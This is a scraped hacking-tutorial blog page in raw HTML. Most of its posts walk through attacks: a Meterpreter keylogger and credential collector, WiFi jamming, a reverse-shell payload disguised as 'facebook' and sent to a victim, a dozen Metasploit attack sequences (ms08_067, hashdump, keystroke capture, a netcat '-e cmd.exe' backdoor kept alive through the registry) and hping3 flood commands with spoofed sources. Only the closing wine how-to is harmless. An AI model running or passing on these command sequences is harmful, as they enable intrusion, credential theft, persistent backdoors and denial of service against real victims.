0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Command:- run keylogrecorder</span></span></span></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><br /></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><strong><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">Credcollect</span></span></span></span></strong></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: #4e4e4e;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="color: black;">credcollect used collect the hashes of victim users</span>.</span></span></span></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Command:- run credcollect</span></span></span></div></div>

Some of the Cool Metasploit Metrepreter script

Getcountermeasure Getcountermeasure is an automated script Disable security measures such as antivirus, firewall, and more. Command:...

+ Read more »

How to jam WIFI network in UBUNTU & BACK TRACK?

<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div align="LEFT" style="line-height: 0.19in; margin-bottom: 0in;"><span style="font-family: 'Bitstream Charter', serif; font-size: medium; line-height: 0.19in;">If you have UBUNTU or BACK TRACK installed ,then you can start from step 7 directly you can skip first six step. If you have windows user start from here.</span></div><div align="LEFT" style="line-height: 0.19in; margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></span></div><div align="LEFT" style="line-height: 0.19in; margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Step </span></span></span><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">1</span></span></span><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">: Download Backtrack 5 R2 here as .iso for 32 bit:</span></span></span><a href="http://www.backtrack-linux.org/ajax/download_redirect.php?id=BT5R2-GNOME-32.iso" target="_blank"><span style="color: black;"><span style="text-decoration: none;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">http://www.backtrack-linux.org/ajax/down...OME-32.iso</span></span></span></span></a><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></span><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">and 64 bit:</span></span></span><span style="color: black;"><span style="text-decoration: none;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><a href="http://www.backtrack-linux.org/ajax/download_redirect.php?id=BT5R2-GNOME-64.iso" target="_blank">http://www.backtrack-linux.org/ajax/down...OME-64.iso</a></span></span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></span><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Step 2: Download UNetbootin for Windows:</span></span></span><span style="color: black;"><span style="text-decoration: none;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><a href="http://unetbootin.sourceforge.net/unetbootin-windows-latest.exe" target="_blank">http://unetbootin.sourceforge.net/unetbo...latest.exe</a></span></span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></span><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Step 3: Insert your FAT32 formatted flash/hard drive and open UNetbootin.</span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></span><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></span><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Step 4: At the bottom of UNetbootin you'll see it says Disc Image. Select ISO and find your file.</span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></span><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Type: USB-drive.</span></span></span><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></span><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Letter: H:\ or whatever your computer says.</span></span></span><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></span><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Then press on OK and let it finish.</span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></span><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></span><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Step 5: When it's done, press on Reboot now and when you're booting, remember to boot on your flash/hard drive. I use F12 when I'm booting to change, but it depends on each computer.</span></span></span><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></span></div><a name="more"></a><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Step 6: Select Default, and wait for it to boot. When it's done booting, write "startx" in the console so it will start your desktop.</span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></span><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Step 7: Connect to your favorite WiFi network. Go to the "start icon" in Backtrack, go to Network and find "Wicd Network Manager". Connect to your wireless.</span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></span><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Step 8: Open Terminal and write:</span></span></span><br /><div align="LEFT" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; margin-bottom: 0.04in; margin-top: 0.04in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="font-family: 'Bitstream Charter', serif; font-size: medium;"><span style="line-height: 18px;"><b></b></span></span></div><div align="LEFT" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; margin-bottom: 0.04in; margin-top: 0.04in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="font-family: 'Bitstream Charter', serif; font-size: medium;"><b>Code:</b></span></div><div align="LEFT" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; margin-bottom: 0.04in; margin-top: 0.04in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="font-family: 'Bitstream Charter', serif; font-size: medium;"><b>wget http://wifijammer.googlecode.com/files/wifijammer_0.1.sh</b></span></div><br /><div align="LEFT" style="line-height: 0.19in; margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">After the transfer has completed you now type:</span></span></span></div><div align="LEFT" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; margin-bottom: 0.04in; margin-top: 0.04in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="font-family: 'Bitstream Charter', serif; font-size: medium;"><span style="line-height: 18px;"><b></b></span></span></div><div align="LEFT" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; margin-bottom: 0.04in; margin-top: 0.04in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="font-family: 'Bitstream Charter', serif; font-size: medium;"><b>Code:</b></span></div><div align="LEFT" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; margin-bottom: 0.04in; margin-top: 0.04in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="font-family: 'Bitstream Charter', serif; font-size: medium;"><b>chmod +x wifijammer_0.1.sh</b></span></div><br /><div align="LEFT" style="line-height: 0.19in; margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Now you write:</span></span></span></div><div align="LEFT" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; margin-bottom: 0.04in; margin-top: 0.04in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="font-family: 'Bitstream Charter', serif; font-size: medium;"><span style="line-height: 18px;"><b></b></span></span></div><div align="LEFT" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; margin-bottom: 0.04in; margin-top: 0.04in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="font-family: 'Bitstream Charter', serif; font-size: medium;"><b>Code:</b></span></div><div align="LEFT" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; margin-bottom: 0.04in; margin-top: 0.04in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="font-family: 'Bitstream Charter', serif; font-size: medium;"><b>sudo ./wifijammer_0.1.sh wlan0</b></span><br /><span style="font-family: 'Bitstream Charter', serif; font-size: medium;"><b><br /></b></span><span style="font-family: 'Bitstream Charter', serif; font-size: medium; line-height: 18.233333587646484px;">When that's done, you type in "scan" when it asks you to.</span><br /><br style="font-family: 'Bitstream Charter', serif; font-size: large; line-height: 18.233333587646484px;" /><span style="font-family: 'Bitstream Charter', serif; font-size: medium; line-height: 18.233333587646484px;">Step 9: You will see a lot of text when it scans. It will look like this:</span></div><br /><div align="LEFT" style="line-height: 0.19in; margin-bottom: 0in;"><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXCPYozLqmsPS02wPQhKWbmfOpUe7JdglS0b-qdMYC5RZKiMpsoVSOub1FgiV4mPC_uOrQhYRCGZSAjbqUt9wF99fiwCU0eSK_PEFgRIZvVdzjsm_hJm8S09hiwe5GCFDHiYnpKlf5GTc_/s1600/wifi-jammer.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="wifi-jammer" border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXCPYozLqmsPS02wPQhKWbmfOpUe7JdglS0b-qdMYC5RZKiMpsoVSOub1FgiV4mPC_uOrQhYRCGZSAjbqUt9wF99fiwCU0eSK_PEFgRIZvVdzjsm_hJm8S09hiwe5GCFDHiYnpKlf5GTc_/s400/wifi-jammer.jpg" title="wifi-jammer" width="400" /></a></div><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br />You can see it says "CH" in the window. That means channel. On the picture, the ESSID is the WiFi's name. As you can see, the network with ESSID "openn" is on channel 9.<br /><br />Wait for the scan to complete, and then (in this example) type in "9" for channel 9.<br /><br />It will now jam all connections on channel 9, so that the WiFi "openn" will be unavailable. On the picture there's also a network with ESSID "Playh" on channel 9.. That one will also be unavailable.<br /><br />In some cases, it might jam so hard, that laptops/WiFi searchers won't be able to scan for any WiFi signals at all.</span></span></span></div></div>

How to jam WIFI network in UBUNTU & BACK TRACK?

If you have UBUNTU or BACK TRACK installed ,then you can start from step 7 directly you can skip first six step. If you have windows user st...

+ Read more »

Hack Linux OS using METASPLOIT

<div dir="ltr" style="text-align: left;" trbidi="on">The most common use of msfpayload tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing a module.<br /><br />msfpayload linux/x86/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 x > /root/Desktop/facebook<br /><br /><br /><div align="JUSTIFY" style="line-height: 0.2in; margin-bottom: 0in;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8fQpTqYTz5R75pNa4BV6H2jQpwi2mBiJy2s1fGgfqPYFEHZcHVNXaZ4kd6fRiXxzpq7vWiY-nJP6Fe6W98s6yK-N_xz3aQjMBcavHY5XiTg71NtA8flY0yzFwT-dzzCahhYneWHntLDcf/s1600/Screenshot.jpg" imageanchor="1" style="display: inline ! important; margin-left: 1em; margin-right: 1em; text-align: center;"><img alt="ubuntu-exploit" border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8fQpTqYTz5R75pNa4BV6H2jQpwi2mBiJy2s1fGgfqPYFEHZcHVNXaZ4kd6fRiXxzpq7vWiY-nJP6Fe6W98s6yK-N_xz3aQjMBcavHY5XiTg71NtA8flY0yzFwT-dzzCahhYneWHntLDcf/s320/Screenshot.jpg" title="ubuntu-exploit" width="320" /></a></div></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><br /></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;">Now we successfully generate the malicious exe File, it will stored on your local computer /root/Desktop/facebook<br /><br />Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.<br /><br />Open your terminal & type following commands.</div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><br />msfconsole<br /><br />use exploit/multi/handler<br /><br />set payload linux/x86/meterpreter/reverse_tcp<br /><br />set lhost 192.168.1.6<br /><br />set lport 4444<br /><br />exploit<br /><br /><br />Now send your facebook.exe files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.</div></div>

Hack Linux OS using METASPLOIT

The most common use of msfpayload tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework o...

+ Read more »

How to Find Email-Address of the domain using metasploit?

<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div align="LEFT"><b><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">First open your terminal & Type following command</span></span></span></span></b></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><b>msfconsole</b></span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><b><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">use auxiliary/gather/search_email_collector show options</span></span></span></span></b></div><div align="LEFT"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjghr-MqebviLc_XTkjV0Bn7gRjfx9LFiVtycC-2fq6MdVLokt7fzq39tNt4PVWBy6Rab_QNJbl7bE3xidRNnEQWt2ykiXja8F_L-EhBfrK5uqULX3xBCprqyO7zScnF53cpXBLgyjwnJ2z/s1600/Screenshot1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img alt="metasploit-email-harvest" border="0" height="243" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjghr-MqebviLc_XTkjV0Bn7gRjfx9LFiVtycC-2fq6MdVLokt7fzq39tNt4PVWBy6Rab_QNJbl7bE3xidRNnEQWt2ykiXja8F_L-EhBfrK5uqULX3xBCprqyO7zScnF53cpXBLgyjwnJ2z/s320/Screenshot1.jpg" title="metasploit-email-harvest" width="320" /></a></div></div><b><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><br /></span></span></b> <br /><div align="LEFT"><b><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">The next step you need to set up the domain you want to locate the email address.</span></span></span></span></b></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">When we finished setup the domain, the default searching engine that will be use for this searching are </span></span></span><b><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">Google</span></span></span></span></b><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">, </span></span></span><b><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">Bing</span></span></span></span></b><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">, and </span></span></span><b><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">Yahoo</span></span></span></span></b><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">.</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Now next step is type</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><b>set domain “name of domain”</b> (without quote) & press enter.</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">& type <b>run </b>and press enter.</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">It will search email address of domain in google,yahoo & bing.</span></span></span></div><div align="LEFT"><br /><br /></div></div>

How to Find Email-Address of the domain using metasploit?

First open your terminal & Type following command msfconsole use auxiliary/gather/search_email_collector show options The next s...

+ Read more »

Some Metasploit Attacks

<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div align="LEFT"><strong><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;"><br />today i will show you Some metasploit attacks.</span></span></span></span></strong></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Requirement:-</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Backtrack.</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Metasploit.</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><br /></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">These are just some commands ,there are lots of options in metasploit. Acoording to vulnarability you can use it.</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><br /></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="color: #676767;">Attack 1: Hacking Windows XP with Metasploit tutorial - VNC remote control</span><br /><br />use windows/smb/ms08_067_netapi<br />show optios<br />set RHOST 192.168.1.1 <span style="color: #676767;">----->IP target</span><br />set payload windows/vncinject/bind_tcp<br />exploit</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></span></div><a name="more"></a><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /><span style="color: #676767;">Attack 2.Metasploit vs Windows 7 and AVG</span><br />use exploit/multi/handler<br />set payload windows/meterpreter/reverse_tcp<br />set LHOT 192.168.0.1 <span style="color: #676767;">----->IP Attacker</span><br />set LPORT 5555<br />exploit<br />ps<br />migrate 1880<br />cd c:\ ls<br />download program-7.exe /root<br />run killav<br />shell<br /><br /><span style="color: #676767;">Attack 3. Hacking By Metasploit . Windows xp Sp3 </span><br />use windows/smb/ms08_067_netapi<br />set LHOST 192.168.1.1 <span style="color: #676767;">--->ip attacker</span><br />set RHOST 192.168.1.1<span style="color: #676767;"> ----->ip target</span><br />set payload windows/meterpreter/reverse_tcp<br />exploit<br /><br /><span style="color: #676767;">Attack 4: Hacking win7 with metasploit</span><br />nmap -sS -v -PN 192.168.1-255<br />use exploit/multi/handler<br />set LHOST 192.168.1.1 <span style="color: #676767;">------>ip attacker</span><br />set LPORT 5555<br />set payload windows/meterpreter/reverse_tcp<br />show optios<br />set EndOnSession false<br />show optios<br />set RHOST 192. <span style="color: #676767;">------>ip target</span><br />set RPORT 4321<br />show options<br />exploit<br /><br /><span style="color: #676767;">Attack 5: Exploit vulnerability in Windows 7</span><br />sudo nmap 192.168.1.1 <span style="color: #676767;">------>445/tcp_open microsoft-ds</span><br />use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh<br />set RHOST 192.168.1.1 <span style="color: #676767;">-----------ip target</span><br />set RPORT 445<br />run <span style="color: #676767;">----run the exploit</span><br /><br /><span style="color: #676767;">Attack 6: Metasploit backdooring</span><br />msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 X >backdoor.exe<br />root@kislay# cd /tmp<br />use exploit/multi/handler<br />set payload windows/meterpreter/reverse_tcp<br />set LHOST 192.168.1.1 <span style="color: #676767;">--->Listener's IP (Attacker)</span><br />show options<br />exploit<br />?<br />getuid<br />use priv<br />hashdump<br />keyscan_start<br />keyscan_dump<br />sysinfo<br />msg * <span style="color: #676767;">------->msg displayed on the screen</span><br /><br /><span style="color: #676767;">Attack 7: ms10 025 metasploit exploitation</span><br />nmap -O 192.168.1.7-----see the target operating system<br />search ms10<br />use exploit windows/mmsp/ms10_25_wmss_connect_funnel<br />set payload windows/shell_bind_tcp<br />show options<br />set RHOST 192.168.1.7 <span style="color: #676767;">--ip target</span><br />exploit<br /><br /><span style="color: #676767;">Attack 8: IEPeers: ms10_08_ie_behaviors Exploit</span><br />search iepeers<br />use windows/browser/ms10_018_ie_behaviors<br />set PAYLOAD windows/exec<br />show options<br />set SRVHOST 192.168.1.1<br />set URIPATH /<br />set CMD calc.exe<br />set target 1<br />info <span style="color: #676767;">---->Available targets ;1 IE 6 spo-sp2 (onclick)</span><br />exploit<br /><span style="color: #676767;">using url:</span> http://192.168.1.1:8080/<br /><span style="color: #676767;">open the browser mozilla or whatever browser used</span><br /><span style="color: #676767;">type:</span> http://192.168.1.1:8080/<span style="color: #676767;"> ---enter</span><br /><span style="color: #676767;">wait a few moments...</span><br /><br /><span style="color: #676767;">Attack 9: metasploit rpc_dum</span><br />nmap -sS 192.168...<br />135/TCP open<br />use msrpc_dcom_ms03_026<br />set payload win32_reverse_meterpreter<br />show options<br />set RHOST 192.168.1.1 <span style="color: #676767;">---->ip target</span><br />set LHOST 192.168.0.1 <span style="color: #676767;">----->ip attacker</span><br />exploit<br />help<br />use -m process<br />execute -f cmd.exe -c<br />interact 1<br />c:\winnt\system32\>dir<br /><br /><span style="color: #676767;">Attack 10: Uploading A Backdoor Metasploit Netcat</span><br /><span style="color: #676767;">meterpreter> </span>upload netcat.exe c:\\WINDOWS\\SYSTEM32\\<br /><span style="color: #676767;">meterpreter></span> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run<br /><span style="color: #676767;">meterpreter></span> reg setval -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run -v windows live -d "c:\\WINDOWS\\SYSTEM32\\netcat.exe -L -d -p 5555 -e cmd.exe<br /><span style="color: #676767;">meterpreter></span> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run<br /><span style="color: #676767;">meterpreter></span> reboot<br /><span style="color: #676767;">bt</span>~# nc 192.168.1.1 5555<br /><br /><span style="color: #676767;">Attack 11: BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7</span><br />cd /pentest/exploits/SET<br />./set<br />Enter you choice: 4<br />enter the ip addres : 192.168.1.1<br />enter chose ( hit enter for default): 2<br />enter chose ( hit enter for default):16<br />set port 4444<br /><span style="color: #676767;">open Konqueror </span>/pentest/exploits/SET/<br />media/sda3 <span style="color: #676767;">---------->msf.exe</span><br />cd /pentest/exploits/SET# cd ..</span></span></span><br /><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">/pentest/exploits# cd framework3<br />./msfconsole<br />use exploit/multi/handler<br />set payload windows/meterpreter/reverse_tcp<br />set lhost 192.168..<br />set lport 4444<br />exploit<br />use priv<br />help<br />excecute -f cmd<br />ipconfig<br />shell<br />screenhot<br />excecute -f explorer<br /><br /><span style="color: #676767;">Attack 12:ms067 + netcat backdoor</span><br />use windows/smb/ms08_067_netapi<br />set payload windows/meterpreter/reverse_tcp<br />set RHOST<br />set LHOST<br />exploit<br />upload /root/nc.exe c:\\WINDOWS\\SYSTEM32\\</span></span></span></div></div>

Some Metasploit Attacks

today i will show you Some metasploit attacks. Requirement:- Backtrack. Metasploit. These are just some commands ,there are lots of options ...

+ Read more »

DOS attack from linux using hping3.

<div dir="ltr" style="text-align: left;" trbidi="on"><b><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">I am here to explain the DoS attacks (with practicals). You all know about DoS attack, Denial-of-Service Attacks. In this attack, attacker denies the user to use a particular service. You can have many tools for DoS attacks, but I'm gonna teach you a simple method for stress testing on the service.</span></span></b><b><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;"><br /></span></span></span></b><b><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">We need Hping3 (It is available in linux only but you can use hping2 in windows but i can't assure you that it will work for this practical).</span></span></b><b><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><a href="http://www.hping.org/download.php">Download Hping2/3 here</a> .</span></span></b><br /><div align="LEFT" style="margin-bottom: 0in;"><br /></div><div align="LEFT" style="margin-bottom: 0in;"><br /></div><div align="LEFT" style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><b>Ok so let's bring down some services.</b></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><b></b></span></span></span></div><a name="more"></a><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><b><br /></b><b>Open the console and go to the path of hping3 and give the following command.</b><b><br /><br />hping3 --rand-source –S –L 0 –p <target port> <target IP></b><b>Here we are sending SYN packets (set value by replacing 0) with a random source.</b><b><br /><br />hping3 --rand-source –SA –p <open port> <target IP></b><b>Here we are sending SYN + ACK packets from a random source.</b><b><br /><br />hping3 --rand-source -–udp <target IP> --flood</b><b>Flooding the target IP with UDP packets.</b><b><br /><br />hping3 --rand-source –SAFRU –L 0 –M 0 –p <port> <target> --flood</b><b>In this command, we are sending SYN+ACK+FIN+RST+URG packets with TCP ack (-L) and TCP seq (-M). Change the values after -L and -M.</b><b><br /><br />hping3 --icmp --spoof <target address> <broadcast address> --flood</b><b>Flooding with ICMP packets by spoofed IP (--spoof).</b><b><br /></b><b>Once you download the hping, open your console and type "hping3 --help" for more options.</b></span></span></span></div>

DOS attack from linux using hping3.

I am here to explain the DoS attacks (with practicals). You all know about DoS attack, Denial-of-Service Attacks. In this attack, attacker d...

+ Read more »

HOW TO run .Exe files with wine ?

<div dir="ltr" style="text-align: left;" trbidi="on">If you run a .exe file with wine and see The file '/home/[username]/example.exe' is not marked as executable. If this was downloaded or copied form an untrusted source, it may be dangerous to run.For more details, read about the executable bit.or anything like that then: This tutorial is for you!<br /><br />EDIT: (Actually, this will work on any linux computer but in fluxbox when you right-click on the .exe file and go to the permissions tab there is no mark as executable checkbox [for me] So we have no other choice but to do it via terminal)<br /><br />The only thing we have to do is mark it as executable. [which will be explained below]<br /><br />I will take the example of example.exe<br /><br />It is located in /home/[username]/Downloads<br /><br />First, I will go to home/[username]/Downloads or whatever the folder is<br /><br />If you did this (go to the folder) with a file manager then (after you are in the folder where the .exe file is present) right click on an empty space on the folder---> then click open in terminal.<br /><br />A terminal should pop up.<br /><br />in the terminal type ls<br /><br />just to see if your file is there. If it isn't then you are not in the correct folder. NOTE: The file should NOT have any spaces. If it does then go back to the folder where it is and right-click it and click Rename then delete the spaces then continue:<br /><br />Type<br /><br />chmod 544 example.exe<br /><br />(Replace example.exe with your .exe file)<br /><br /><br />Now go to the .exe file with your file manager. You should see a lock on it. This means that it is executable.<br /><br />Click on it. It will open! If it doesn't then either the file can't be opened by wine or you need to upgrade your wine version<br /><br />And that's the end of the tutorial!</div>

HOW TO run .Exe files with wine ?

If you run a .exe file with wine and see The file '/home/[username]/example.exe' is not marked as executable. If this was downloaded...

+ Read more »